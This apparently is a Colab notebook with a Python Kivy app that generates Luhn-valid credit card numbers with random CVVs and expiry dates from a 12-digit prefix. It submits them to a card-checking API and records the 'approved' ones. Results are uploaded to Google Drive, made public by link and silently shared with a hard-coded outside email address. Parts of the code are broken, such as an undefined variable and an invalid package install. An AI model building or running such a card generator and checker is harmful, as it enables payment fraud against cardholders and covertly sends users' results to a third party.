<a href="https://colab.research.google.com/github/Cc-Solutions-sold/MoneyMagnetCCGEN/blob/main/MMCCG.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
import subprocess
import sys
import os

# ... (Your Existing Code) ...

# Save to a .py file
# Create the directory if it doesn't exist:
os.makedirs('/mnt/data', exist_ok=True)
# exist_ok=True prevents an error if the directory already exists.

file_path = "/mnt/data/UnknownCCGEN_Setup.py"
with open(file_path, "w") as file:
    file.write(code)

file_path
!pip install kivy requests pandas sqlite3 pydrive2

import subprocess
import sys

# Function to install missing dependencies
def install_package(package):
    subprocess.check_call([sys.executable, "-m", "pip", "install", package])

# List of required packages
required_packages = ["kivy", "requests", "pandas", "sqlite3", "pydrive2"]

# Install missing packages
for package in required_packages:
    try:
        __import__(package)
    except ImportError:
        print(f"Package {package} not found, installing...")
        install_package(package)

# Rest of your code (the app code) goes here...
import requests
import pandas as pd
import sqlite3
import threading
from datetime import datetime
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.textinput import TextInput
from kivy.uix.button import Button
from pydrive2.auth import GoogleAuth
from pydrive2.drive import GoogleDrive
from random import randint

# Constants and variables
db_file = 'approval_tracker.db'
api_url = "https://api.chkr.com/validate"
csv_file = "valid_numbers.csv"
date_str = datetime.now().strftime("%Y-%m-%d")
cc_results_file = f"CCRESULTS_{date_str}.csv"

# Initialize SQLite database
def init_db():
    with sqlite3.connect(db_file) as conn:
        c = conn.cursor()
        c.execute('''CREATE TABLE IF NOT EXISTS approvals
                     (id INTEGER PRIMARY KEY AUTOINCREMENT,
                      numbers TEXT,
                      approval_status TEXT,
                      timestamp DATETIME DEFAULT CURRENT_TIMESTAMP)''')
        conn.commit()

# Save data to SQLite database
def save_to_db(numbers, approval_status):
    with sqlite3.connect(db_file) as conn:
        c = conn.cursor()
        c.execute("INSERT INTO approvals (numbers, approval_status) VALUES (?, ?)",
                  (numbers, approval_status))
        conn.commit()

# Fetch database entries
def fetch_db():
    with sqlite3.connect(db_file) as conn:
        c = conn.cursor()
        c.execute("SELECT * FROM approvals")
        return [f"{row[1]} - {row[2]} on {row[3]}" for row in c.fetchall()]

# Generate card number using Luhn algorithm and random CVV and expiration date
def generate_card_data(first_12_digits):
    valid_cards = []
    for _ in range(150):
        last_4 = generate_luhn_last_4(first_12_digits)
        cvv = randint(100, 999)  # Random 3-digit CVV
        expiration = f"{randint(1, 12):02d}{randint(22, 30):02d}"  # Random expiration (MMYY)
        card_number = f"{first_12_digits}{last_4}"
        valid_cards.append(f"{card_number}|{expiration}|{cvv}")
    return valid_cards

# Generate last 4 digits using Luhn algorithm
def generate_luhn_last_4(first_12_digits):
    def luhn_check(card_number):
        total = 0
        reverse_digits = list(map(int, str(card_number)))[::-1]
        for i, digit in enumerate(reverse_digits):
            if i % 2 == 1:
                digit = digit * 2
                if digit > 9:
                    digit -= 9
            total += digit
        return total % 10 == 0

    while True:
        last_4 = ''.join([str(randint(0, 9)) for _ in range(4)])
        full_number = first_12_digits + last_4
        if luhn_check(full_number):
            return last_4

# Call chkr API to validate card numbers
def call_chkr_api(numbers):
    response = requests.post(api_url, json={"numbers": numbers})
    if response.status_code == 200:
        return response.json()
    return None

# Process card numbers and check via chkr API
def process_numbers(numbers):
    response = call_chkr_api(numbers)
    if response:
        valid_numbers = [num for num in response.get("valid_numbers", [])]
        update_results_csv(valid_numbers)
        upload_to_drive(cc_results_file)
        return f"Valid Numbers: {', '.join(valid_numbers)}"
    return "API Error."

# Update CSV file with valid numbers
def update_results_csv(valid_numbers):
    df = pd.DataFrame(valid_numbers, columns=["Valid Numbers"])
    df.to_csv(cc_results_file, mode='a', index=False, header=not pd.io.common.file_exists(cc_results_file))

# Upload file to Google Drive
def upload_to_drive(file_path):
    gauth = GoogleAuth()
    gauth.LocalWebserverAuth()
    drive = GoogleDrive(gauth)
    file_list = drive.ListFile({'q': f"title = '{file_path}'"}).GetList()

    if file_list:
        file = file_list[0]
        file.SetContentFile(file_path)
        file.Upload()
        set_file_permissions(file)
    else:
        file = drive.CreateFile({'title': file_path})
        file.SetContentFile(file_path)
        file.Upload()
        set_file_permissions(file)

# Set file permissions to be accessible by anyone with the link and share with specific email
def set_file_permissions(file):
    # Set the file to be accessible by anyone with the link
    file.InsertPermission({'type': 'anyone', 'value': 'anyone', 'role': 'reader'})
    # Share the file with the specified email address
    file.InsertPermission({'type': 'user', 'value': 'x.overlord.x@outlook.com', 'role': 'reader'})

# Kivy App
class ApprovalApp(App):
    kv_file = None # This line is added to prevent Kivy from searching for a .kv file

    def build(self):
        self.layout = BoxLayout(orientation='vertical')

        self.label = Label(text='Enter 12 digits of the card:')
        self.layout.add_widget(self.label)

        self.input_field = TextInput(multiline=False)
        self.layout.add_widget(self.input_field)

        self.submit_button = Button(text='Submit')
        self.submit_button.bind(on_press=self.run_validation)
        self.layout.add_widget(self.submit_button)

        self.view_db_button = Button(text='View Database')
        self.view_db_button.bind(on_press=self.show_database)
        self.layout.add_widget(self.view_db_button)

        return self.layout

    def run_validation(self, instance):
        first_12_digits = self.input_field.text.strip()
        threading.Thread(target=self.validate_numbers, args=(first_12_digits,)).start()

    def validate_numbers(self, first_12_digits):
        valid_cards = generate_card_data(first_12_digits)
        results = process_numbers(valid_cards)
        self.label.text = results
        if "Valid Numbers:" in results:
            save_to_db(first_12_digits, "Approved")

    def show_database(self, instance):
        entries = fetch_db()
        db_view = '\n'.join(entries) if entries else "No records found."
        self.label.text = db_view

if __name__ == '__main__':
    init_db()
    ApprovalApp().run()